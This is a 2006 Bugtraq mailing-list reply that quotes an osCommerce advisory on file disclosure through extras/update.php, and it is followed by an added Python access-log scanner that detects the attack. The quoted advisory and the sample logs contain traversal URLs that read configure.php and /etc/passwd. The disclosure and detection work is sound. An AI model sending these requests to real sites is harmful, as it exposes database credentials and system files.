Message-ID: <B3BCAF4246A8A84983A80DAB50FE7242396B94@secnap2.secnap.com>
Date: Sat, 15 Apr 2006 08:39:14 -0400
From: "Michael Scheidell" <scheidell@...nap.net>
To: <rgod@...istici.org>, <bugtraq@...urityfocus.com>
Cc: <andiroo@...il.com>
Subject: RE: osCommerce  "extras/" information/source code disclosure


> -----Original Message-----
> From: rgod@...istici.org [mailto:rgod@...istici.org] 
> Sent: Friday, April 14, 2006 7:20 AM
> To: bugtraq@...urityfocus.com
> Subject: osCommerce "extras/" information/source code disclosure
> 
> 
> ---- osCommerce <= 2.2 "extras/" information/source code 
> disclosure ------------
> 
> software site: http://www.oscommerce.com/
> 
> 
> if extras/ folder is placed inside the www path, you can see 
> all files on target system, including php source code with 
> database details, poc:
> 
> http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
> http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/passwd


Amazing:  this was reported to oscommerce almost a year ago by andiroo
blat gmail, and they didn't do anything about it?

http://sourceforge.net/mailarchive/message.php?msg_id=12318248

http://www.oscommerce.com/community/bugs,2835

For you snorters, rules have been posted to snort-sigs and bleeding
mailing list.
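The reply above mentions detection signatures but does not show one. The following Python script, added here as an illustration and not part of this thread or of the osCommerce project, shows the equivalent check applied to web-server access logs: it flags requests to `extras/update.php` whose `readme_file` parameter carries a directory-traversal segment or an absolute path, the two request shapes the advisory describes. It assumes Apache/Nginx "combined" log format; the log lines, IP addresses and timestamps are constructed sample data, and the decoding depth of three rounds is an arbitrary choice to catch double percent-encoding.

```python
"""Flag osCommerce extras/update.php file-disclosure attempts in access logs.

Added example for this thread; assumes Apache/Nginx "combined" log format.
All sample log lines below are constructed, not captured traffic.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined log format: client IP, identd, user, [timestamp], "request line", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The script named in the advisory; any install path prefix is accepted.
TARGET_SUFFIX = "/extras/update.php"


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding so that %252e%252e is seen as '..'.

    Three rounds is an assumed, arbitrary bound on nesting depth.
    """
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_unsafe_readme_path(value: str) -> bool:
    """True if the readme_file value escapes the intended directory."""
    path = fully_decode(value).replace("\\", "/")
    if path.startswith("/"):  # absolute path, e.g. /etc/passwd
        return True
    # Any '..' path segment is a traversal attempt (README.txt is not).
    return any(segment == ".." for segment in path.split("/"))


def analyse_line(line: str):
    """Return a finding dict for a suspicious request, else None."""
    match = LOG_RE.match(line)
    if not match:
        return None  # not a combined-format line; ignore it
    parts = urlsplit(match.group("target"))
    if not fully_decode(parts.path).endswith(TARGET_SUFFIX):
        return None  # unrelated URL
    params = parse_qs(parts.query, keep_blank_values=True)
    for candidate in params.get("readme_file", []):
        if is_unsafe_readme_path(candidate):
            return {
                "ip": match.group("ip"),
                "time": match.group("ts"),
                "readme_file": fully_decode(candidate),
                "status": int(match.group("status")),
            }
    return None


def scan(lines):
    """Run analyse_line over an iterable of log lines; keep the findings."""
    return [f for f in (analyse_line(line) for line in lines) if f]


# Constructed sample log: two advisory-style requests, one double-encoded
# variant, one benign README read and one unrelated page view.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Apr/2006:07:20:01 -0400] "GET /shop/extras/update.php'
    '?read_me=0&readme_file=../catalog/includes/configure.php HTTP/1.1" 200 4312 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [14/Apr/2006:07:20:05 -0400] "GET /shop/extras/update.php'
    '?read_me=0&readme_file=/etc/passwd HTTP/1.1" 200 1820 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Apr/2006:07:21:10 -0400] "GET /shop/extras/update.php'
    '?read_me=1&readme_file=README.txt HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [14/Apr/2006:07:22:00 -0400] "GET /shop/extras/update.php'
    '?read_me=0&readme_file=%252e%252e%2fcatalog%2fincludes%2fconfigure.php HTTP/1.1" 200 4312 "-" "-"',
    '192.0.2.3 - - [14/Apr/2006:07:23:00 -0400] "GET /shop/catalog/index.php HTTP/1.1" 200 5000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f'{finding["time"]} {finding["ip"]} read {finding["readme_file"]} (HTTP {finding["status"]})')
```

A 200 status on a flagged request is the case worth escalating, since it means the server served the file; an inspection of `catalog/includes/configure.php` exposure would then warrant rotating the database credentials it contains.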





